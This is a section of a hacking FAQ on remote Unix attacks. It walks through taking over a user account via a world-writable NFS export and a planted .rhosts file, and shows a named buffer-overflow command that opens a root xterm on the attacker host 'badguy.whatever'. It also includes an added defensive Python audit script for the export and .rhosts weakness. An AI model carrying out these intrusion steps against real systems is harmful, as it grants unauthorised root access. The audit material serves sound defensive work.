The Hack FAQ

30.0 Unix Remote Attacks


This section deals with hacking Unix systems remotely.


30.1 What are remote hacks?

A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from a regular PC (depending on the operating system).

Guessing a user account and password (unless it is a guest account) on a remote system is barely considered a remote hack, so we won't really cover that. We'll assume you don't know an account name and password on the remote system.

Remote hacks come in a couple of different flavors. Usually the goal is to exploit an existing service running on the victim server that is misconfigured or allows too much access. Exporting an NFS file system read/write to the world might not be a bad thing in itself, but if the exported directories contain .rhosts files, then it can be a very bad thing. Also, certain daemons may be subject to remote buffer overflows, allowing someone at a remote location to run arbitrary commands on the victim server.

Here are a couple of examples:

  1. You are root on a host named badguy.
  2. You discover the host victim is exporting /home2/old read/writable to the world.
  3. You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months.
  4. Quickly, you create a fred account on badguy.
  5. Now you mount /home2/old and create an .rhosts file to establish trust with badguy.
  6. After you become fred on badguy, you rlogin to the victim as fred.
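The misconfiguration the list above turns into a login (an NFS tree exported read/write to the world that holds .rhosts files) can be checked for from the server side. The script below is an added example, not part of the original FAQ: it parses exports(5) syntax, flags exports that are read/write to any host, lists the .rhosts files found beneath them, and separately flags .rhosts files that use the "+" wildcard. The exports text and .rhosts contents it reads are constructed samples embedded inline, and the function names are my own.

```python
"""Audit helper for the NFS export / .rhosts trust problem described above.
Added example; the sample inputs below are constructed, not from a real host."""
import re

# --- constructed sample /etc/exports (Linux exports(5) syntax) ---------------
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home2/old      *(rw,no_root_squash)
/srv/pub        *(ro)
/home2/new      10.0.0.0/24(rw) trusted.example.com(rw)
/data           (rw)
/scratch        *.example.com(rw,root_squash)
"""

# --- constructed map of .rhosts files found under exported trees -> contents --
SAMPLE_RHOSTS = {
    "/home2/old/fred/.rhosts": "badguy.whatever fred\n",
    "/home2/new/alice/.rhosts": "+ +\n",
    "/srv/pub/.rhosts": "localhost\n",
}

# exports(5): a client of '*' exports to every host; a bare option list with no
# host part (the classic "/dir (rw)" with a space) is also treated as every host.
WORLD_CLIENTS = {"*", ""}


def parse_exports(text):
    """Return a list of (path, [(client, set(options)), ...]) from exports(5) text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], []
        for token in parts[1:]:
            m = re.fullmatch(r"([^()]*)(?:\((.*)\))?", token)
            host, opts = m.group(1), m.group(2) or ""
            clients.append((host, {o for o in opts.split(",") if o}))
        if not clients:                          # "/path" alone: every host, default options
            clients.append(("*", set()))
        entries.append((path, clients))
    return entries


def world_writable_exports(text):
    """Paths exported read/write to any host."""
    risky = []
    for path, clients in parse_exports(text):
        if any(host in WORLD_CLIENTS and "rw" in opts for host, opts in clients):
            risky.append(path)
    return risky


def parse_rhosts(text):
    """Return (host, user) pairs from .rhosts contents; user defaults to ''."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        pairs.append((fields[0], fields[1] if len(fields) > 1 else ""))
    return pairs


def wildcard_rhosts(rhosts_files):
    """Paths of .rhosts files that trust any host or any user via '+'."""
    return sorted(
        rfile for rfile, contents in rhosts_files.items()
        if any(host == "+" or user == "+" for host, user in parse_rhosts(contents))
    )


def audit(exports_text, rhosts_files):
    """Cross-reference: every .rhosts file that sits inside a world read/write
    export, as (export path, .rhosts path, number of trust entries).  Anyone who
    can mount the export can rewrite these files and establish trust."""
    findings = []
    for path in world_writable_exports(exports_text):
        prefix = path.rstrip("/") + "/"
        for rfile, contents in sorted(rhosts_files.items()):
            if rfile.startswith(prefix):
                findings.append((path, rfile, len(parse_rhosts(contents))))
    return findings


if __name__ == "__main__":
    for export, rfile, n in audit(SAMPLE_EXPORTS, SAMPLE_RHOSTS):
        print(f"world-rw export {export} contains {rfile} ({n} trust entries)")
    for rfile in wildcard_rhosts(SAMPLE_RHOSTS):
        print(f"wildcard trust in {rfile}")
```

On a real host you would feed audit() the contents of /etc/exports and a map built by walking the exported trees for .rhosts files (and /etc/hosts.equiv, which grants the same kind of trust system-wide). Note the parser's handling of "/data (rw)": the space before the parentheses makes that an export to every host, a long-standing exports(5) pitfall.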

Here's another attack involving a buffer overflow:

  1. This remote system is running named.
  2. You have written a named exploit that allows you to send arbitrary commands through the named daemon. It uses a buffer overflow trick; you compile it and name it sploit.
  3. You type: sploit ns.example.com "/usr/X11R6/bin/xterm -display badguy.whatever:0"
  4. A window appears on your terminal that is running as root on ns.example.com.
